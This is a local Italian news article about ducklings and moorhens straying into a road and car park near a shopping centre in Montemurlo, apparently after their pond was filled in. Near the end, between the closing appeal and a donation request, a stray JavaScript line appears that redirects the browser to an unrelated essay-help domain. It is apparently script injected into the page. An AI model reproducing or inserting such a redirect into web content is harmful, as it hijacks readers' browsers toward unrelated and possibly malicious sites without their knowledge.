PERICOLO! ANATROCCOLI IN STRADA A MONTEMURLO

La "squadra" di anatroccoli in strada.
La squadra di anatroccoli in strada

MONTEMURLO. Ci arriva una segnalazione particolare: nei pressi del centro commerciale di via Livorno a Montemurlo oltre una ventina di papere e di gallinelle d’acqua sarebbero state “sfrattate” dallo stagno formatosi in un’area privata di via Livorno, davanti la Coop.

Secondo alcuni testimoni il ristagno naturale d’acqua creato nel terreno di natura argillosa che da tempo ha ospitato gruppi di anatre, germani reali e qualche papero, oltre a pesci e ranocchi., sarebbe stato interrato e insabbiato dai proprietari del terreno tanto che una squadra di anatroccoli (oltre venti) è stata in questi giorni immortalata in mezzo alla strada e al parcheggio.

Un'altra immagine curiosa
Un’altra immagine curiosa

“Le ho trovate – ci spiega Giovanni Del Fante – a girovagare verso le 21 di due giorni fa (il 28 settembre per l’esattezza – n.d.r.) con il rischio di essere schiacciate. Ho telefonato alla Polizia Municipale per avvisarli e mi hanno detto che anche altre volte era successa la medesima cosa e che avrebbero fatto qualcosa. Nella stessa serata sono ripassato alle 22:30 e le anatre erano sempre lì fuori dal recinto. Mi sono accorto anche che la rete perimetrale non era al suolo ma ben alta almeno 6-8 cm dal suolo. Quindi le ho fatte rientrare nello stagno ma da quella lunga apertura possono comunque passare”.

Nel parcheggio del ristorante Mamma Butta la pasta
Nel parcheggio del ristorante Mamma, butta la pasta

Nei mesi scorsi a causa del grande caldo l’amministrazione comunale si era interessata delle condizioni dei volatili e per questo aveva preso contatti con il proprietario del terreno per concordare le possibili azioni di salvataggio.

Tra le ipotesi c’era quella di chiedere l’intervento immediato della polizia provinciale in grado di valutare lo stato di sofferenza degli animali dello stagno e provvedere al loro eventuale spostamento, così come era accaduto qualche settimana prima a Prato per i pesci del torrente Bardena, povero di acqua, tratti in salvo dagli uomini della Vab.

Da Google map
Da Google map

L’altra ipotesi al vaglio prevedeva di allertare direttamente le squadre del Wwf. Evidentemente qualcuno non ha fatto il proprio dovere o sono mancati alcuni passaggi fondamentali.

Ci appelliamo quindi a chi di dovere sia per permettere agli animali di vivere in un habitat a loro più congeniale rispetto ad uno stagno vicino al cemento e al traffico, sia per salvaguardare  la pubblica incolumità.

window.location = “http://paper-help24h.com”;

Sostenete questo quotidiano con un piccolo contributo attraverso bonifico intestato a

«Linee Stampalibera» Iban IT64H0306913834100000008677 su Intesa San Paolo Spa - Pistoia. Riceverete informazioni senza censure!

Print Friendly, PDF & Email

One thought on “PERICOLO! ANATROCCOLI IN STRADA A MONTEMURLO

Lascia un commento